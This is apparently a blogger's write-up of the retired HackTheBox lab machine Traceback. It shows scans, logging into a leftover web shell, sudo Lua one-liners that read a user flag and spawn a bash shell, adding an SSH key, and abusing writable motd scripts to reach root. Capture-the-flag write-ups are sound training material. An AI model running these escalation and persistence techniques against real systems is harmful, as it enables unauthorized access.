This series will follow my exercises in HackTheBox. All published writeups are for retired HTB machines. Whether or not I use Metasploit to pwn the server will be indicated in the title.
Machine IP: 10.10.10.181
I kick things off with a port scan.
sudo nmap -sS -T4 -p- 10.10.10.181 Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-09 00:35 EDT Nmap scan report for 10.10.10.181 Host is up (0.019s latency). Not shown: 65533 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 13.56 seconds
sudo nmap -sT -T4 -p22,80 -A -sC -sV 10.10.10.181 Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-09 00:36 EDT Nmap scan report for 10.10.10.181 Host is up (0.015s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA) | 256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA) |_ 256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Help us
All right, a web server.
gobuster doesn’t turn up anything.
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 20 -u http://10.10.10.181/ -x txt,php gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 30 -u http://10.10.10.181 -x txt,php
http://10.10.10.181/ brings up a page with the following message:
This site has been owned
I have left a backdoor for all the net. FREE INTERNETZZZ
The source of the page includes the comment:
<!--Some of the best web shells that you might need ;)-->
Searching the internet for
Xh4H brings up this tweet:
Pretty interesting collection of webshells: https://t.co/gRllNN08zt
— Xh4H (@RiftWhiteHat) March 10, 2020
That brings me to https://github.com/TheBinitGhimire/Web-Shells.
I compile a wordlist of web shell endpoints and run them through
This time I get a hit!
gobuster dir -w webshells.txt -u http://10.10.10.181 =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.10.181 [+] Threads: 10 [+] Wordlist: webshells.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/06/09 00:53:10 Starting gobuster =============================================================== /smevk.php (Status: 200) =============================================================== 2020/06/09 00:53:10 Finished ===============================================================
Navigating to that URL brings up a web shell login page.
Looking at the web shell source, I see the credentials are
admin / admin.
This logs me in.
I can run commands through the web shell, but I cannot trigger netcat.
I opt for some information gathering before creating a full reverse shell through this web shell.
I am running as the
There is another user on the system as well,
webadmin’s directory, I find a note:
A tool somewhere that lets me invoke Lua, huh?
webadmin’s bash history and find the location of the script:
/home/sysadmin/luvit it is.
And it looks like
webadmin has permission to run the script:
GTFOBins has some suggestions on how to use Lua for my purposes. I can read the user flag with:
sudo -u sysadmin /home/sysadmin/luvit -e 'local f=io.open("/home/sysadmin/user.txt", "rb"); print(f:read("*a")); io.close(f);'
Now for the reverse shell.
Instead of figuring out a Lua one-liner, I opt to upload a PHP reverse shell (like
/use/share/webshells/php/php-reverse-shell.php that is included on Kali) to the web server using the
smevk web shell.
This gives me a
webadmin user shell.
With a TTY shell, I can escalate my privileges to
sysadmin by running:
sudo -u sysadmin /home/sysadmin/luvit -e 'os.execute("/bin/bash -i")'
I check to see what files
sysadmin can access on the server:
find / -type f -user sysadmin 2>/dev/null | grep -v '/proc/' /home/sysadmin/.bashrc /home/sysadmin/luvit /home/sysadmin/.bash_logout /home/sysadmin/.ssh/authorized_keys /home/sysadmin/.cache/motd.legal-displayed /home/sysadmin/.bash_history /home/sysadmin/user.txt /home/sysadmin/.profile /home/webadmin/note.txt
/home/sysadmin/.cache/motd.legal-displayed is unusual, but otherwise not interesting.
I also run LinEnum which highlights an interesting process that seems related to this file.
It appears that every 30 seconds,
root updates the
motd handles the banner messages when you ssh onto a system.
Since I am
sysadmin, I can go to
/home/sysadmin/.ssh/authorized_keys and add my public key.
SSHing onto the system, I see the following banner message:
I see this message comes from the
sysadmin has write access to these files.
[email protected]:/etc/update-motd.d$ ls -l total 24 -rwxrwxr-x 1 root sysadmin 981 Jun 8 23:17 00-header -rwxrwxr-x 1 root sysadmin 982 Jun 8 23:17 10-help-text -rwxrwxr-x 1 root sysadmin 4264 Jun 8 23:17 50-motd-news -rwxrwxr-x 1 root sysadmin 604 Jun 8 23:17 80-esm -rwxrwxr-x 1 root sysadmin 299 Jun 8 23:17 91-release-upgrade
I should be able to get a reverse shell by modifying this
00-header file, but I couldn’t get the syntax correct.
The official Traceback write-up has a payload, it seems.
Instead, I opted to read the root flag.
When I next SSH onto the system, I am presented with the root flag. Remember that root flags are ephemeral these days, so this root flag is no longer valid and attempting to use it may get your HTB account flagged.